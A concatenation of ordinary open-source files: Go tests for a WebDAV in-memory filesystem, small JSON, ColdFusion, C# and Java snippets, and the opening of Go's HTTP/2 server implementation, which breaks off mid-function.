" stat /d want errNotExist",
" stat /d/e want errNotExist",
" stat /d/f want errNotExist",
" stat /d/g want errNotExist",
" stat /d/m want errNotExist",
" stat /d/m/p want errNotExist",
" find / /a",
"mk-dir /d/m want errNotExist",
"mk-dir /d want ok",
"create /d/f FFFF want ok",
"rm-all /d/f want ok",
"mk-dir /d/m want ok",
"rm-all /z want ok",
"rm-all / want err",
"create /b BB want ok",
" stat / want dir",
" stat /a want 1",
" stat /b want 2",
" stat /c want errNotExist",
" stat /d want dir",
" stat /d/m want dir",
" find / /a /b /d /d/m",
"move__ o=F /b /c want ok",
" stat /b want errNotExist",
" stat /c want 2",
" stat /d/m want dir",
" stat /d/n want errNotExist",
" find / /a /c /d /d/m",
"move__ o=F /d/m /d/n want ok",
"create /d/n/q QQQQ want ok",
" stat /d/m want errNotExist",
" stat /d/n want dir",
" stat /d/n/q want 4",
"move__ o=F /d /d/n/z want err",
"move__ o=T /c /d/n/q want ok",
" stat /c want errNotExist",
" stat /d/n/q want 2",
" find / /a /d /d/n /d/n/q",
"create /d/n/r RRRRR want ok",
"mk-dir /u want ok",
"mk-dir /u/v want ok",
"move__ o=F /d/n /u want errExist",
"create /t TTTTTT want ok",
"move__ o=F /d/n /t want errExist",
"rm-all /t want ok",
"move__ o=F /d/n /t want ok",
" stat /d want dir",
" stat /d/n want errNotExist",
" stat /d/n/r want errNotExist",
" stat /t want dir",
" stat /t/q want 2",
" stat /t/r want 5",
" find / /a /d /t /t/q /t/r /u /u/v",
"move__ o=F /t / want errExist",
"move__ o=T /t /u/v want ok",
" stat /u/v/r want 5",
"move__ o=F / /z want err",
" find / /a /d /u /u/v /u/v/q /u/v/r",
" stat /a want 1",
" stat /b want errNotExist",
" stat /c want errNotExist",
" stat /u/v/r want 5",
"copy__ o=F d=0 /a /b want ok",
"copy__ o=T d=0 /a /c want ok",
" stat /a want 1",
" stat /b want 1",
" stat /c want 1",
" stat /u/v/r want 5",
"copy__ o=F d=0 /u/v/r /b want errExist",
" stat /b want 1",
"copy__ o=T d=0 /u/v/r /b want ok",
" stat /a want 1",
" stat /b want 5",
" stat /u/v/r want 5",
"rm-all /a want ok",
"rm-all /b want ok",
"mk-dir /u/v/w want ok",
"create /u/v/w/s SSSSSSSS want ok",
" stat /d want dir",
" stat /d/x want errNotExist",
" stat /d/y want errNotExist",
" stat /u/v/r want 5",
" stat /u/v/w/s want 8",
" find / /c /d /u /u/v /u/v/q /u/v/r /u/v/w /u/v/w/s",
"copy__ o=T d=0 /u/v /d/x want ok",
"copy__ o=T d=∞ /u/v /d/y want ok",
"rm-all /u want ok",
" stat /d/x want dir",
" stat /d/x/q want errNotExist",
" stat /d/x/r want errNotExist",
" stat /d/x/w want errNotExist",
" stat /d/x/w/s want errNotExist",
" stat /d/y want dir",
" stat /d/y/q want 2",
" stat /d/y/r want 5",
" stat /d/y/w want dir",
" stat /d/y/w/s want 8",
" stat /u want errNotExist",
" find / /c /d /d/x /d/y /d/y/q /d/y/r /d/y/w /d/y/w/s",
"copy__ o=F d=∞ /d/y /d/x want errExist",
}
ctx := context.Background()
for i, tc := range testCases {
tc = strings.TrimSpace(tc)
j := strings.IndexByte(tc, ' ')
if j < 0 {
t.Fatalf("test case #%d %q: invalid command", i, tc)
}
op, arg := tc[:j], tc[j+1:]
switch op {
default:
t.Fatalf("test case #%d %q: invalid operation %q", i, tc, op)
case "create":
parts := strings.Split(arg, " ")
if len(parts) != 4 || parts[2] != "want" {
t.Fatalf("test case #%d %q: invalid write", i, tc)
}
f, opErr := fs.OpenFile(ctx, parts[0], os.O_RDWR|os.O_CREATE|os.O_TRUNC, 0666)
if got := errStr(opErr); got != parts[3] {
t.Fatalf("test case #%d %q: OpenFile: got %q (%v), want %q", i, tc, got, opErr, parts[3])
}
if f != nil {
if _, err := f.Write([]byte(parts[1])); err != nil {
t.Fatalf("test case #%d %q: Write: %v", i, tc, err)
}
if err := f.Close(); err != nil {
t.Fatalf("test case #%d %q: Close: %v", i, tc, err)
}
}
case "find":
got, err := find(ctx, nil, fs, "/")
if err != nil {
t.Fatalf("test case #%d %q: find: %v", i, tc, err)
}
sort.Strings(got)
want := strings.Split(arg, " ")
if !reflect.DeepEqual(got, want) {
t.Fatalf("test case #%d %q:\ngot %s\nwant %s", i, tc, got, want)
}
case "copy__", "mk-dir", "move__", "rm-all", "stat":
nParts := 3
switch op {
case "copy__":
nParts = 6
case "move__":
nParts = 5
}
parts := strings.Split(arg, " ")
if len(parts) != nParts {
t.Fatalf("test case #%d %q: invalid %s", i, tc, op)
}
got, opErr := "", error(nil)
switch op {
case "copy__":
depth := 0
if parts[1] == "d=∞" {
depth = infiniteDepth
}
_, opErr = copyFiles(ctx, fs, parts[2], parts[3], parts[0] == "o=T", depth, 0)
case "mk-dir":
opErr = fs.Mkdir(ctx, parts[0], 0777)
case "move__":
_, opErr = moveFiles(ctx, fs, parts[1], parts[2], parts[0] == "o=T")
case "rm-all":
opErr = fs.RemoveAll(ctx, parts[0])
case "stat":
var stat os.FileInfo
fileName := parts[0]
if stat, opErr = fs.Stat(ctx, fileName); opErr == nil {
if stat.IsDir() {
got = "dir"
} else {
got = strconv.Itoa(int(stat.Size()))
}
if fileName == "/" {
// For a Dir FileSystem, the virtual file system root maps to a
// real file system name like "/tmp/webdav-test012345", which does
// not end with "/". We skip such cases.
} else if statName := stat.Name(); path.Base(fileName) != statName {
t.Fatalf("test case #%d %q: file name %q inconsistent with stat name %q",
i, tc, fileName, statName)
}
}
}
if got == "" {
got = errStr(opErr)
}
if parts[len(parts)-2] != "want" {
t.Fatalf("test case #%d %q: invalid %s", i, tc, op)
}
if want := parts[len(parts)-1]; got != want {
t.Fatalf("test case #%d %q: got %q (%v), want %q", i, tc, got, opErr, want)
}
}
}
}
func TestDir(t *testing.T) {
switch runtime.GOOS {
case "nacl":
t.Skip("see golang.org/issue/12004")
case "plan9":
t.Skip("see golang.org/issue/11453")
}
td, err := ioutil.TempDir("", "webdav-test")
if err != nil {
t.Fatal(err)
}
defer os.RemoveAll(td)
testFS(t, Dir(td))
}
func TestMemFS(t *testing.T) {
testFS(t, NewMemFS())
}
func TestMemFSRoot(t *testing.T) {
ctx := context.Background()
fs := NewMemFS()
for i := 0; i < 5; i++ {
stat, err := fs.Stat(ctx, "/")
if err != nil {
t.Fatalf("i=%d: Stat: %v", i, err)
}
if !stat.IsDir() {
t.Fatalf("i=%d: Stat.IsDir is false, want true", i)
}
f, err := fs.OpenFile(ctx, "/", os.O_RDONLY, 0)
if err != nil {
t.Fatalf("i=%d: OpenFile: %v", i, err)
}
defer f.Close()
children, err := f.Readdir(-1)
if err != nil {
t.Fatalf("i=%d: Readdir: %v", i, err)
}
if len(children) != i {
t.Fatalf("i=%d: got %d children, want %d", i, len(children), i)
}
if _, err := f.Write(make([]byte, 1)); err == nil {
t.Fatalf("i=%d: Write: got nil error, want non-nil", i)
}
if err := fs.Mkdir(ctx, fmt.Sprintf("/dir%d", i), 0777); err != nil {
t.Fatalf("i=%d: Mkdir: %v", i, err)
}
}
}
func TestMemFileReaddir(t *testing.T) {
ctx := context.Background()
fs := NewMemFS()
if err := fs.Mkdir(ctx, "/foo", 0777); err != nil {
t.Fatalf("Mkdir: %v", err)
}
readdir := func(count int) ([]os.FileInfo, error) {
f, err := fs.OpenFile(ctx, "/foo", os.O_RDONLY, 0)
if err != nil {
t.Fatalf("OpenFile: %v", err)
}
defer f.Close()
return f.Readdir(count)
}
if got, err := readdir(-1); len(got) != 0 || err != nil {
t.Fatalf("readdir(-1): got %d fileInfos with err=%v, want 0, <nil>", len(got), err)
}
if got, err := readdir(+1); len(got) != 0 || err != io.EOF {
t.Fatalf("readdir(+1): got %d fileInfos with err=%v, want 0, EOF", len(got), err)
}
}
func TestMemFile(t *testing.T) {
testCases := []string{
"wantData ",
"wantSize 0",
"write abc",
"wantData abc",
"write de",
"wantData abcde",
"wantSize 5",
"write 5*x",
"write 4*y+2*z",
"write 3*st",
"wantData abcdexxxxxyyyyzzststst",
"wantSize 22",
"seek set 4 want 4",
"write EFG",
"wantData abcdEFGxxxyyyyzzststst",
"wantSize 22",
"seek set 2 want 2",
"read cdEF",
"read Gx",
"seek cur 0 want 8",
"seek cur 2 want 10",
"seek cur -1 want 9",
"write J",
"wantData abcdEFGxxJyyyyzzststst",
"wantSize 22",
"seek cur -4 want 6",
"write ghijk",
"wantData abcdEFghijkyyyzzststst",
"wantSize 22",
"read yyyz",
"seek cur 0 want 15",
"write ",
"seek cur 0 want 15",
"read ",
"seek cur 0 want 15",
"seek end -3 want 19",
"write ZZ",
"wantData abcdEFghijkyyyzzstsZZt",
"wantSize 22",
"write 4*A",
"wantData abcdEFghijkyyyzzstsZZAAAA",
"wantSize 25",
"seek end 0 want 25",
"seek end -5 want 20",
"read Z+4*A",
"write 5*B",
"wantData abcdEFghijkyyyzzstsZZAAAABBBBB",
"wantSize 30",
"seek end 10 want 40",
"write C",
"wantData abcdEFghijkyyyzzstsZZAAAABBBBB..........C",
"wantSize 41",
"write D",
"wantData abcdEFghijkyyyzzstsZZAAAABBBBB..........CD",
"wantSize 42",
"seek set 43 want 43",
"write E",
"wantData abcdEFghijkyyyzzstsZZAAAABBBBB..........CD.E",
"wantSize 44",
"seek set 0 want 0",
"write 5*123456789_",
"wantData 123456789_123456789_123456789_123456789_123456789_",
"wantSize 50",
"seek cur 0 want 50",
"seek cur -99 want err",
}
ctx := context.Background()
const filename = "/foo"
fs := NewMemFS()
f, err := fs.OpenFile(ctx, filename, os.O_RDWR|os.O_CREATE|os.O_TRUNC, 0666)
if err != nil {
t.Fatalf("OpenFile: %v", err)
}
defer f.Close()
for i, tc := range testCases {
j := strings.IndexByte(tc, ' ')
if j < 0 {
t.Fatalf("test case #%d %q: invalid command", i, tc)
}
op, arg := tc[:j], tc[j+1:]
// Expand an arg like "3*a+2*b" to "aaabb".
parts := strings.Split(arg, "+")
for j, part := range parts {
if k := strings.IndexByte(part, '*'); k >= 0 {
repeatCount, repeatStr := part[:k], part[k+1:]
n, err := strconv.Atoi(repeatCount)
if err != nil {
t.Fatalf("test case #%d %q: invalid repeat count %q", i, tc, repeatCount)
}
parts[j] = strings.Repeat(repeatStr, n)
}
}
arg = strings.Join(parts, "")
switch op {
default:
t.Fatalf("test case #%d %q: invalid operation %q", i, tc, op)
case "read":
buf := make([]byte, len(arg))
if _, err := io.ReadFull(f, buf); err != nil {
t.Fatalf("test case #%d %q: ReadFull: %v", i, tc, err)
}
if got := string(buf); got != arg {
t.Fatalf("test case #%d %q:\ngot %q\nwant %q", i, tc, got, arg)
}
case "seek":
parts := strings.Split(arg, " ")
if len(parts) != 4 {
t.Fatalf("test case #%d %q: invalid seek", i, tc)
}
whence := 0
switch parts[0] {
default:
t.Fatalf("test case #%d %q: invalid seek whence", i, tc)
case "set":
whence = os.SEEK_SET
case "cur":
whence = os.SEEK_CUR
case "end":
whence = os.SEEK_END
}
offset, err := strconv.Atoi(parts[1])
if err != nil {
t.Fatalf("test case #%d %q: invalid offset %q", i, tc, parts[1])
}
if parts[2] != "want" {
t.Fatalf("test case #%d %q: invalid seek", i, tc)
}
if parts[3] == "err" {
_, err := f.Seek(int64(offset), whence)
if err == nil {
t.Fatalf("test case #%d %q: Seek returned nil error, want non-nil", i, tc)
}
} else {
got, err := f.Seek(int64(offset), whence)
if err != nil {
t.Fatalf("test case #%d %q: Seek: %v", i, tc, err)
}
want, err := strconv.Atoi(parts[3])
if err != nil {
t.Fatalf("test case #%d %q: invalid want %q", i, tc, parts[3])
}
if got != int64(want) {
t.Fatalf("test case #%d %q: got %d, want %d", i, tc, got, want)
}
}
case "write":
n, err := f.Write([]byte(arg))
if err != nil {
t.Fatalf("test case #%d %q: write: %v", i, tc, err)
}
if n != len(arg) {
t.Fatalf("test case #%d %q: write returned %d bytes, want %d", i, tc, n, len(arg))
}
case "wantData":
g, err := fs.OpenFile(ctx, filename, os.O_RDONLY, 0666)
if err != nil {
t.Fatalf("test case #%d %q: OpenFile: %v", i, tc, err)
}
gotBytes, err := ioutil.ReadAll(g)
if err != nil {
t.Fatalf("test case #%d %q: ReadAll: %v", i, tc, err)
}
for i, c := range gotBytes {
if c == '\x00' {
gotBytes[i] = '.'
}
}
got := string(gotBytes)
if got != arg {
t.Fatalf("test case #%d %q:\ngot %q\nwant %q", i, tc, got, arg)
}
if err := g.Close(); err != nil {
t.Fatalf("test case #%d %q: Close: %v", i, tc, err)
}
case "wantSize":
n, err := strconv.Atoi(arg)
if err != nil {
t.Fatalf("test case #%d %q: invalid size %q", i, tc, arg)
}
fi, err := fs.Stat(ctx, filename)
if err != nil {
t.Fatalf("test case #%d %q: Stat: %v", i, tc, err)
}
if got, want := fi.Size(), int64(n); got != want {
t.Fatalf("test case #%d %q: got %d, want %d", i, tc, got, want)
}
}
}
}
// TestMemFileWriteAllocs tests that writing N consecutive 1KiB chunks to a
// memFile doesn't allocate a new buffer for each of those N times. Otherwise,
// calling io.Copy(aMemFile, src) is likely to have quadratic complexity.
func TestMemFileWriteAllocs(t *testing.T) {
if runtime.Compiler == "gccgo" {
t.Skip("gccgo allocates here")
}
ctx := context.Background()
fs := NewMemFS()
f, err := fs.OpenFile(ctx, "/xxx", os.O_RDWR|os.O_CREATE|os.O_TRUNC, 0666)
if err != nil {
t.Fatalf("OpenFile: %v", err)
}
defer f.Close()
xxx := make([]byte, 1024)
for i := range xxx {
xxx[i] = 'x'
}
a := testing.AllocsPerRun(100, func() {
f.Write(xxx)
})
// AllocsPerRun returns an integral value, so we compare the rounded-down
// number to zero.
if a > 0 {
t.Fatalf("%v allocs per run, want 0", a)
}
}
func BenchmarkMemFileWrite(b *testing.B) {
ctx := context.Background()
fs := NewMemFS()
xxx := make([]byte, 1024)
for i := range xxx {
xxx[i] = 'x'
}
b.ResetTimer()
for i := 0; i < b.N; i++ {
f, err := fs.OpenFile(ctx, "/xxx", os.O_RDWR|os.O_CREATE|os.O_TRUNC, 0666)
if err != nil {
b.Fatalf("OpenFile: %v", err)
}
for j := 0; j < 100; j++ {
f.Write(xxx)
}
if err := f.Close(); err != nil {
b.Fatalf("Close: %v", err)
}
if err := fs.RemoveAll(ctx, "/xxx"); err != nil {
b.Fatalf("RemoveAll: %v", err)
}
}
}
func TestCopyMoveProps(t *testing.T) {
ctx := context.Background()
fs := NewMemFS()
create := func(name string) error {
f, err := fs.OpenFile(ctx, name, os.O_RDWR|os.O_CREATE|os.O_TRUNC, 0666)
if err != nil {
return err
}
_, wErr := f.Write([]byte("contents"))
cErr := f.Close()
if wErr != nil {
return wErr
}
return cErr
}
patch := func(name string, patches ...Proppatch) error {
f, err := fs.OpenFile(ctx, name, os.O_RDWR, 0666)
if err != nil {
return err
}
_, pErr := f.(DeadPropsHolder).Patch(patches)
cErr := f.Close()
if pErr != nil {
return pErr
}
return cErr
}
props := func(name string) (map[xml.Name]Property, error) {
f, err := fs.OpenFile(ctx, name, os.O_RDWR, 0666)
if err != nil {
return nil, err
}
m, pErr := f.(DeadPropsHolder).DeadProps()
cErr := f.Close()
if pErr != nil {
return nil, pErr
}
if cErr != nil {
return nil, cErr
}
return m, nil
}
p0 := Property{
XMLName: xml.Name{Space: "x:", Local: "boat"},
InnerXML: []byte("pea-green"),
}
p1 := Property{
XMLName: xml.Name{Space: "x:", Local: "ring"},
InnerXML: []byte("1 shilling"),
}
p2 := Property{
XMLName: xml.Name{Space: "x:", Local: "spoon"},
InnerXML: []byte("runcible"),
}
p3 := Property{
XMLName: xml.Name{Space: "x:", Local: "moon"},
InnerXML: []byte("light"),
}
if err := create("/src"); err != nil {
t.Fatalf("create /src: %v", err)
}
if err := patch("/src", Proppatch{Props: []Property{p0, p1}}); err != nil {
t.Fatalf("patch /src +p0 +p1: %v", err)
}
if _, err := copyFiles(ctx, fs, "/src", "/tmp", true, infiniteDepth, 0); err != nil {
t.Fatalf("copyFiles /src /tmp: %v", err)
}
if _, err := moveFiles(ctx, fs, "/tmp", "/dst", true); err != nil {
t.Fatalf("moveFiles /tmp /dst: %v", err)
}
if err := patch("/src", Proppatch{Props: []Property{p0}, Remove: true}); err != nil {
t.Fatalf("patch /src -p0: %v", err)
}
if err := patch("/src", Proppatch{Props: []Property{p2}}); err != nil {
t.Fatalf("patch /src +p2: %v", err)
}
if err := patch("/dst", Proppatch{Props: []Property{p1}, Remove: true}); err != nil {
t.Fatalf("patch /dst -p1: %v", err)
}
if err := patch("/dst", Proppatch{Props: []Property{p3}}); err != nil {
t.Fatalf("patch /dst +p3: %v", err)
}
gotSrc, err := props("/src")
if err != nil {
t.Fatalf("props /src: %v", err)
}
wantSrc := map[xml.Name]Property{
p1.XMLName: p1,
p2.XMLName: p2,
}
if !reflect.DeepEqual(gotSrc, wantSrc) {
t.Fatalf("props /src:\ngot %v\nwant %v", gotSrc, wantSrc)
}
gotDst, err := props("/dst")
if err != nil {
t.Fatalf("props /dst: %v", err)
}
wantDst := map[xml.Name]Property{
p0.XMLName: p0,
p3.XMLName: p3,
}
if !reflect.DeepEqual(gotDst, wantDst) {
t.Fatalf("props /dst:\ngot %v\nwant %v", gotDst, wantDst)
}
}
func TestWalkFS(t *testing.T) {
testCases := []struct {
desc string
buildfs []string
startAt string
depth int
walkFn filepath.WalkFunc
want []string
}{{
"just root",
[]string{},
"/",
infiniteDepth,
nil,
[]string{
"/",
},
}, {
"infinite walk from root",
[]string{
"mkdir /a",
"mkdir /a/b",
"touch /a/b/c",
"mkdir /a/d",
"mkdir /e",
"touch /f",
},
"/",
infiniteDepth,
nil,
[]string{
"/",
"/a",
"/a/b",
"/a/b/c",
"/a/d",
"/e",
"/f",
},
}, {
"infinite walk from subdir",
[]string{
"mkdir /a",
"mkdir /a/b",
"touch /a/b/c",
"mkdir /a/d",
"mkdir /e",
"touch /f",
},
"/a",
infiniteDepth,
nil,
[]string{
"/a",
"/a/b",
"/a/b/c",
"/a/d",
},
}, {
"depth 1 walk from root",
[]string{
"mkdir /a",
"mkdir /a/b",
"touch /a/b/c",
"mkdir /a/d",
"mkdir /e",
"touch /f",
},
"/",
1,
nil,
[]string{
"/",
"/a",
"/e",
"/f",
},
}, {
"depth 1 walk from subdir",
[]string{
"mkdir /a",
"mkdir /a/b",
"touch /a/b/c",
"mkdir /a/b/g",
"mkdir /a/b/g/h",
"touch /a/b/g/i",
"touch /a/b/g/h/j",
},
"/a/b",
1,
nil,
[]string{
"/a/b",
"/a/b/c",
"/a/b/g",
},
}, {
"depth 0 walk from subdir",
[]string{
"mkdir /a",
"mkdir /a/b",
"touch /a/b/c",
"mkdir /a/b/g",
"mkdir /a/b/g/h",
"touch /a/b/g/i",
"touch /a/b/g/h/j",
},
"/a/b",
0,
nil,
[]string{
"/a/b",
},
}, {
"infinite walk from file",
[]string{
"mkdir /a",
"touch /a/b",
"touch /a/c",
},
"/a/b",
0,
nil,
[]string{
"/a/b",
},
}, {
"infinite walk with skipped subdir",
[]string{
"mkdir /a",
"mkdir /a/b",
"touch /a/b/c",
"mkdir /a/b/g",
"mkdir /a/b/g/h",
"touch /a/b/g/i",
"touch /a/b/g/h/j",
"touch /a/b/z",
},
"/",
infiniteDepth,
func(path string, info os.FileInfo, err error) error {
if path == "/a/b/g" {
return filepath.SkipDir
}
return nil
},
[]string{
"/",
"/a",
"/a/b",
"/a/b/c",
"/a/b/z",
},
}}
ctx := context.Background()
for _, tc := range testCases {
fs, err := buildTestFS(tc.buildfs)
if err != nil {
t.Fatalf("%s: cannot create test filesystem: %v", tc.desc, err)
}
var got []string
traceFn := func(path string, info os.FileInfo, err error) error {
if tc.walkFn != nil {
err = tc.walkFn(path, info, err)
if err != nil {
return err
}
}
got = append(got, path)
return nil
}
fi, err := fs.Stat(ctx, tc.startAt)
if err != nil {
t.Fatalf("%s: cannot stat: %v", tc.desc, err)
}
err = walkFS(ctx, fs, tc.depth, tc.startAt, fi, traceFn)
if err != nil {
t.Errorf("%s:\ngot error %v, want nil", tc.desc, err)
continue
}
sort.Strings(got)
sort.Strings(tc.want)
if !reflect.DeepEqual(got, tc.want) {
t.Errorf("%s:\ngot %q\nwant %q", tc.desc, got, tc.want)
continue
}
}
}
func buildTestFS(buildfs []string) (FileSystem, error) {
// TODO: Could this be merged with the build logic in TestFS?
ctx := context.Background()
fs := NewMemFS()
for _, b := range buildfs {
op := strings.Split(b, " ")
switch op[0] {
case "mkdir":
err := fs.Mkdir(ctx, op[1], os.ModeDir|0777)
if err != nil {
return nil, err
}
case "touch":
f, err := fs.OpenFile(ctx, op[1], os.O_RDWR|os.O_CREATE, 0666)
if err != nil {
return nil, err
}
f.Close()
case "write":
f, err := fs.OpenFile(ctx, op[1], os.O_RDWR|os.O_CREATE|os.O_TRUNC, 0666)
if err != nil {
return nil, err
}
_, err = f.Write([]byte(op[2]))
f.Close()
if err != nil {
return nil, err
}
default:
return nil, fmt.Errorf("unknown file operation %q", op[0])
}
}
return fs, nil
}
| {
"pile_set_name": "Github"
} |
{
"animation":{
"frametime":2
}
} | {
"pile_set_name": "Github"
} |
<cfset variable = 10>
<cfset variable = variable + 10>
<cfscript>
vari<caret>able = 4;
</cfscript> | {
"pile_set_name": "Github"
} |
namespace System.ServiceModel
{
/// <summary>
/// Represents a communication error in either the service or client application.
/// </summary>
public partial class CommunicationException : SystemException
{
/// <summary>
/// Initializes a new instance of the System.ServiceModel.CommunicationException
/// class.
/// </summary>
public CommunicationException()
{ }
/// <summary>
/// Initializes a new instance of the System.ServiceModel.CommunicationException
/// class, using the specified message.
/// </summary>
/// <param name="message">The description of the error condition.</param>
public CommunicationException(string message) : base(message)
{ }
/// <summary>
/// Initializes a new instance of the System.ServiceModel.CommunicationException
/// class, using the specified message and the inner exception.
/// </summary>
/// <param name="message">The description of the error condition.</param>
/// <param name="innerException">The inner exception to be used.</param>
public CommunicationException(string message, Exception innerException) : base(message, innerException)
{ }
}
} | {
"pile_set_name": "Github"
} |
/*
* Copyright 2015 herd contributors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.finra.herd.service.helper;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Component;
import org.finra.herd.dao.StoragePolicyTransitionTypeDao;
import org.finra.herd.model.ObjectNotFoundException;
import org.finra.herd.model.jpa.StoragePolicyTransitionTypeEntity;
/**
* Helper for storage policy transition type related operations which require DAO.
*/
@Component
public class StoragePolicyTransitionTypeDaoHelper
{
@Autowired
private StoragePolicyTransitionTypeDao storagePolicyTransitionTypeDao;
/**
* Gets the storage policy transition type entity and ensure it exists.
*
* @param code the storage policy transition type code (case insensitive)
*
* @return the storage policy transition type entity
* @throws org.finra.herd.model.ObjectNotFoundException if the entity doesn't exist
*/
public StoragePolicyTransitionTypeEntity getStoragePolicyTransitionTypeEntity(String code) throws ObjectNotFoundException
{
StoragePolicyTransitionTypeEntity storagePolicyTransitionTypeEntity = storagePolicyTransitionTypeDao.getStoragePolicyTransitionTypeByCode(code);
if (storagePolicyTransitionTypeEntity == null)
{
throw new ObjectNotFoundException(String.format("Storage policy transition type with code \"%s\" doesn't exist.", code));
}
return storagePolicyTransitionTypeEntity;
}
}
| {
"pile_set_name": "Github"
} |
package railo.runtime.format;
import java.util.Date;
/**
*
*/
public interface Format {
/**
* formats a date to a cfml date format (short)
* @param date
* @return formated String
*/
public abstract String format(Date date);
/**
* formats a date to a cfml date format
* @param date
* @param mask
* @return formated string
*/
public abstract String format(Date date, String mask);
} | {
"pile_set_name": "Github"
} |
// Copyright 2014 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// TODO: turn off the serve goroutine when idle, so
// an idle conn only has the readFrames goroutine active. (which could
// also be optimized probably to pin less memory in crypto/tls). This
// would involve tracking when the serve goroutine is active (atomic
// int32 read/CAS probably?) and starting it up when frames arrive,
// and shutting it down when all handlers exit. the occasional PING
// packets could use time.AfterFunc to call sc.wakeStartServeLoop()
// (which is a no-op if already running) and then queue the PING write
// as normal. The serve loop would then exit in most cases (if no
// Handlers running) and not be woken up again until the PING packet
// returns.
// TODO (maybe): add a mechanism for Handlers to going into
// half-closed-local mode (rw.(io.Closer) test?) but not exit their
// handler, and continue to be able to read from the
// Request.Body. This would be a somewhat semantic change from HTTP/1
// (or at least what we expose in net/http), so I'd probably want to
// add it there too. For now, this package says that returning from
// the Handler ServeHTTP function means you're both done reading and
// done writing, without a way to stop just one or the other.
package http2
import (
"bufio"
"bytes"
"crypto/tls"
"errors"
"fmt"
"io"
"log"
"math"
"net"
"net/http"
"net/textproto"
"net/url"
"os"
"reflect"
"runtime"
"strconv"
"strings"
"sync"
"time"
"golang.org/x/net/http2/hpack"
)
const (
prefaceTimeout = 10 * time.Second
firstSettingsTimeout = 2 * time.Second // should be in-flight with preface anyway
handlerChunkWriteSize = 4 << 10
defaultMaxStreams = 250 // TODO: make this 100 as the GFE seems to?
)
var (
errClientDisconnected = errors.New("client disconnected")
errClosedBody = errors.New("body closed by handler")
errHandlerComplete = errors.New("http2: request body closed due to handler exiting")
errStreamClosed = errors.New("http2: stream closed")
)
var responseWriterStatePool = sync.Pool{
New: func() interface{} {
rws := &responseWriterState{}
rws.bw = bufio.NewWriterSize(chunkWriter{rws}, handlerChunkWriteSize)
return rws
},
}
// Test hooks.
var (
testHookOnConn func()
testHookGetServerConn func(*serverConn)
testHookOnPanicMu *sync.Mutex // nil except in tests
testHookOnPanic func(sc *serverConn, panicVal interface{}) (rePanic bool)
)
// Server is an HTTP/2 server.
type Server struct {
// MaxHandlers limits the number of http.Handler ServeHTTP goroutines
// which may run at a time over all connections.
// Negative or zero no limit.
// TODO: implement
MaxHandlers int
// MaxConcurrentStreams optionally specifies the number of
// concurrent streams that each client may have open at a
// time. This is unrelated to the number of http.Handler goroutines
// which may be active globally, which is MaxHandlers.
// If zero, MaxConcurrentStreams defaults to at least 100, per
// the HTTP/2 spec's recommendations.
MaxConcurrentStreams uint32
// MaxReadFrameSize optionally specifies the largest frame
// this server is willing to read. A valid value is between
// 16k and 16M, inclusive. If zero or otherwise invalid, a
// default value is used.
MaxReadFrameSize uint32
// PermitProhibitedCipherSuites, if true, permits the use of
// cipher suites prohibited by the HTTP/2 spec.
PermitProhibitedCipherSuites bool
// IdleTimeout specifies how long until idle clients should be
// closed with a GOAWAY frame. PING frames are not considered
// activity for the purposes of IdleTimeout.
IdleTimeout time.Duration
// MaxUploadBufferPerConnection is the size of the initial flow
// control window for each connections. The HTTP/2 spec does not
// allow this to be smaller than 65535 or larger than 2^32-1.
// If the value is outside this range, a default value will be
// used instead.
MaxUploadBufferPerConnection int32
// MaxUploadBufferPerStream is the size of the initial flow control
// window for each stream. The HTTP/2 spec does not allow this to
// be larger than 2^32-1. If the value is zero or larger than the
// maximum, a default value will be used instead.
MaxUploadBufferPerStream int32
// NewWriteScheduler constructs a write scheduler for a connection.
// If nil, a default scheduler is chosen.
NewWriteScheduler func() WriteScheduler
// Internal state. This is a pointer (rather than embedded directly)
// so that we don't embed a Mutex in this struct, which will make the
// struct non-copyable, which might break some callers.
state *serverInternalState
}
func (s *Server) initialConnRecvWindowSize() int32 {
if s.MaxUploadBufferPerConnection > initialWindowSize {
return s.MaxUploadBufferPerConnection
}
return 1 << 20
}
func (s *Server) initialStreamRecvWindowSize() int32 {
if s.MaxUploadBufferPerStream > 0 {
return s.MaxUploadBufferPerStream
}
return 1 << 20
}
func (s *Server) maxReadFrameSize() uint32 {
if v := s.MaxReadFrameSize; v >= minMaxFrameSize && v <= maxFrameSize {
return v
}
return defaultMaxReadFrameSize
}
func (s *Server) maxConcurrentStreams() uint32 {
if v := s.MaxConcurrentStreams; v > 0 {
return v
}
return defaultMaxStreams
}
type serverInternalState struct {
mu sync.Mutex
activeConns map[*serverConn]struct{}
}
func (s *serverInternalState) registerConn(sc *serverConn) {
if s == nil {
return // if the Server was used without calling ConfigureServer
}
s.mu.Lock()
s.activeConns[sc] = struct{}{}
s.mu.Unlock()
}
func (s *serverInternalState) unregisterConn(sc *serverConn) {
if s == nil {
return // if the Server was used without calling ConfigureServer
}
s.mu.Lock()
delete(s.activeConns, sc)
s.mu.Unlock()
}
func (s *serverInternalState) startGracefulShutdown() {
if s == nil {
return // if the Server was used without calling ConfigureServer
}
s.mu.Lock()
for sc := range s.activeConns {
sc.startGracefulShutdown()
}
s.mu.Unlock()
}
// ConfigureServer adds HTTP/2 support to a net/http Server.
//
// The configuration conf may be nil.
//
// ConfigureServer must be called before s begins serving.
func ConfigureServer(s *http.Server, conf *Server) error {
if s == nil {
panic("nil *http.Server")
}
if conf == nil {
conf = new(Server)
}
conf.state = &serverInternalState{activeConns: make(map[*serverConn]struct{})}
if err := configureServer18(s, conf); err != nil {
return err
}
if err := configureServer19(s, conf); err != nil {
return err
}
if s.TLSConfig == nil {
s.TLSConfig = new(tls.Config)
} else if s.TLSConfig.CipherSuites != nil {
// If they already provided a CipherSuite list, return
// an error if it has a bad order or is missing
// ECDHE_RSA_WITH_AES_128_GCM_SHA256.
const requiredCipher = tls.TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
haveRequired := false
sawBad := false
for i, cs := range s.TLSConfig.CipherSuites {
if cs == requiredCipher {
haveRequired = true
}
if isBadCipher(cs) {
sawBad = true
} else if sawBad {
